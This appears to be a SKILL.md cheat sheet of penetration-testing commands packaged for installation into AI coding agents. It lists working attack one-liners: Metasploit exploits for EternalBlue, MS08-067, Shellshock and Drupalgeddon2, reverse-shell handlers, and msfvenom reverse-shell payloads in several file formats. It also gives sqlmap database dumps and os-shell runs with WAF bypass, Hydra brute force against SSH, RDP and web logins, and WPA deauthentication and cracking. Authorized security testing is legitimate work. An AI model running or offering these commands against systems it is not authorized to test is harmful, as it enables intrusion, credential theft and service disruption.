Pentest Commands
SKILL.md
Pentest Commands
Purpose
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax
Outputs/Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
Core Workflow
1. Nmap Commands
Host Discovery:
# Ping sweep
nmap -sP 192.168.1.0/24
# List IPs without scanning
nmap -sL 192.168.1.0/24
# Ping scan (host discovery)
nmap -sn 192.168.1.0/24
Port Scanning:
# TCP SYN scan (stealth)
nmap -sS 192.168.1.1
# Full TCP connect scan
nmap -sT 192.168.1.1
# UDP scan
nmap -sU 192.168.1.1
# All ports (1-65535)
nmap -p- 192.168.1.1
# Specific ports
nmap -p 22,80,443 192.168.1.1
Service Detection:
# Service versions
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Comprehensive scan
nmap -A 192.168.1.1
# Skip host discovery
nmap -Pn 192.168.1.1
NSE Scripts:
# Vulnerability scan
nmap --script vuln 192.168.1.1
# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1
# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1
# Check EternalBlue
nmap --script smb-vuln-ms17-010 192.168.1.1
# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1
# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1
# FTP anonymous
nmap --script ftp-anon 192.168.1.1
# DNS brute force
nmap --script dns-brute 192.168.1.1
# HTTP methods
nmap -p80 --script http-methods 192.168.1.1
# HTTP headers
nmap -p80 --script http-headers 192.168.1.1
# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1
Advanced Scans:
# Xmas scan
nmap -sX 192.168.1.1
# ACK scan (firewall detection)
nmap -sA 192.168.1.1
# Window scan
nmap -sW 192.168.1.1
# Traceroute
nmap --traceroute 192.168.1.1
2. Metasploit Commands
Basic Usage:
# Launch Metasploit
msfconsole
# Search for exploits
search type:exploit name:smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
# Set target
set RHOST 192.168.1.1
# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp
# Run exploit
exploit
Common Exploits:
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
Scanners:
# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
Handler Setup:
# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
Payload Generation (msfvenom):
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
# PHP reverse shell
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
# ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
# Python payload
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
3. Nikto Commands
# Basic scan
nikto -h http://192.168.1.1
# Comprehensive scan
nikto -h http://192.168.1.1 -C all
# Output to file
nikto -h http://192.168.1.1 -output report.html
# Plugin-based scans
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
# Export to Metasploit
nikto -h http://192.168.1.1 -Format msf+
# Specific tuning
nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only
4. SQLMap Commands
# Basic injection test
sqlmap -u "http://192.168.1.1/page?id=1"
# Enumerate databases
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
# Enumerate tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
# OS shell
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
# POST request
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
# Cookie injection
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
# Bypass WAF
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
# Risk and level
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
5. Hydra Commands
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
# SMB brute force
hydra -l admin -P passwords.txt smb://192.168.1.1
# RDP brute force
hydra -l admin -P passwords.txt rdp://192.168.1.1
# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.1
# Username list
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
6. John the Ripper Commands
# Crack password file
john hash.txt
# Specify wordlist
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked passwords
john hash.txt --show
# Specify format
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
# SSH key passphrase
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# ZIP password
zip2john file.zip > zip_hash.txt
john zip_hash.txt
7. Aircrack-ng Commands
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
8. Wireshark/Tshark Commands
# Capture traffic
tshark -i eth0 -w capture.pcap
# Read capture file
tshark -r capture.pcap
# Filter by protocol
tshark -r capture.pcap -Y "http"
# Filter by IP
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
# Extract HTTP data
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
Quick Reference
Common Port Scans
# Quick scan
nmap -F 192.168.1.1
# Full comprehensive
nmap -sV -sC -A -p- 192.168.1.1
# Fast with version
nmap -sV -T4 192.168.1.1
Password Hash Types
| Mode | Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast |
Constraints
- Always have written authorization
- Some scans are noisy and detectable
- Brute forcing may lock accounts
- Rate limiting affects tools
Examples
Example 1: Quick Vulnerability Scan
nmap -sV --script vuln 192.168.1.1
Example 2: Web App Test
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
Troubleshooting
| Issue | Solution |
|---|---|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |
Weekly Installs
6
Install
$ npx skills add sickn33/antigravity-awesome-skills --skill "Pentest Commands"Repository
sickn33/antigravity-awesome-skillsInstalled on
cursor5
codex4
claude-code4
antigravity4
gemini-cli4
windsurf3